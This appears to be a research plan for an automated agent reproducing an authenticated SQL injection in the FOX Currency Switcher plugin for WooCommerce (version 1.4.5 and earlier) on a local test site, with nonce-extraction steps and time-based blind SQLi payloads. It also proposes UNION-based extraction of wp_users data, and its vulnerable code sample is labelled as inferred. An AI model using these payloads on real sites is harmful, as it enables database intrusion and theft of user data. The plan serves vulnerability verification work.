FOX <= 1.4.5 - Authenticated (Shop manager+) SQL Injection

This research plan targets a SQL Injection vulnerability in the FOX – Currency Switcher Professional for WooCommerce plugin (version <= 1.4.5). The vulnerability stems from the improper handling of user-supplied parameters in the statistics gathering logic, which are used in raw SQL queries without sufficient preparation or escaping.

1. Vulnerability Summary

• Vulnerability: SQL Injection (Authenticated, Shop Manager+).
• Plugin: FOX – Currency Switcher Professional for WooCommerce (slug: woocommerce-currency-switcher).
• Affected Version: <= 1.4.5.
• Vulnerable Sink: The statistics gathering functions (specifically woocs_get_stats) use user-supplied parameters like order_status or profile within SQL WHERE clauses or IN statements without using $wpdb->prepare().
• Reasoning: The plugin relies on sanitize_text_field() or direct interpolation of array values into strings, which does not prevent SQL injection when the resulting string is used in a database query.

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-ajax.php.
• Action: woocs_get_stats.
• Vulnerable Parameter: order_status.
• Authentication: Requires a user with at least shop_manager capabilities.
• Nonce: Protected by a nonce named woocs_nonce.

3. Code Flow

1. Entry Point: The plugin registers the AJAX action in classes/woocs.php (or index.php depending on version structure) via add_action( 'wp_ajax_woocs_get_stats', array($this, 'woocs_get_stats') );.
2. Input Acquisition: The woocs_get_stats() function (found in classes/woocs.php) retrieves the order_status parameter from $_REQUEST['order_status'].
3. Vulnerable Processing: The code constructs a SQL query string. It often iterates over order_status or uses implode() to create a comma-separated list for a SQL IN clause.
   • Example Vulnerable Logic (Inferred):

     $order_status = $_REQUEST['order_status'];
     $sql = "SELECT ... WHERE order_status IN ('" . implode("','", $order_status) . "') ...";
     $results = $wpdb->get_results($sql);
     

4. Database Sink: The unparameterized string is passed directly to $wpdb->get_results().

4. Nonce Acquisition Strategy

The woocs_nonce is localized into the WordPress admin dashboard for users with access to the plugin settings.

1. Precondition: Authenticate as a shop_manager.
2. Navigation: Navigate to the FOX Settings page: wp-admin/admin.php?page=wc-settings&tab=woocs.
3. Extraction: The plugin uses wp_localize_script to provide the nonce to its admin JS. The variable is typically woocs_vars.
4. Execution Agent Steps:
   • browser_navigate("http://localhost:8080/wp-admin/admin.php?page=wc-settings&tab=woocs")
   • NONCE = browser_eval("window.woocs_vars?.woocs_nonce")

5. Exploitation Strategy

We will use a time-based blind SQL injection payload to confirm the vulnerability, as it is the most reliable method when query results are processed by the application before being returned in JSON format.

• Target URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Content-Type: application/x-www-form-urlencoded
• Payload Construction:
  If the code uses implode("','", $order_status), the payload needs to break out of the quote.
  • order_status[0] = completed') AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND ('1'='1
• Full Request Body:

  action=woocs_get_stats&woocs_nonce=[EXTRACTED_NONCE]&order_status[]=completed') AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND ('1'='1
  

6. Test Data Setup

1. Users: Create a user with the shop_manager role.
2. Plugin Setup:
   • Install and activate WooCommerce.
   • Install and activate FOX - Currency Switcher Professional for WooCommerce (version 1.4.5).
3. Data Requirement: The woocs_get_stats function may require at least one existing WooCommerce order in the database to reach the vulnerable query path.
   • wp wc order create --user=admin --status=completed

7. Expected Results

• Vulnerable Response: The HTTP response will be delayed by approximately 5 seconds. The response body will likely be a JSON object containing statistics or an empty success message.
• Baseline Response: A request with a legitimate order_status (e.g., completed) will return almost instantaneously.

8. Verification Steps

1. Time Delay: Use the http_request tool's time_total metric to confirm the sleep duration.
2. Database Integrity: Verify that the injection did not damage the database (the SELECT query is read-only).
3. Data Extraction (Optional): Attempt to extract the database version:
   • order_status[]=completed') AND (SELECT 1 FROM (SELECT(IF(VERSION() LIKE '8%', SLEEP(5), 0)))a) AND ('1'='1

9. Alternative Approaches

• Error-Based Injection: If WP_DEBUG is enabled, the plugin might leak SQL errors. Send a malformed status like order_status[]=completed'.
• Union-Based Injection: If the results of the query are reflected in the JSON response (e.g., in the graph data), identify the column count and use a UNION SELECT to leak wp_users data.
• Alternative Parameter: Check the profile parameter in the same AJAX action, as FOX often uses similar logic for saving and loading currency profiles.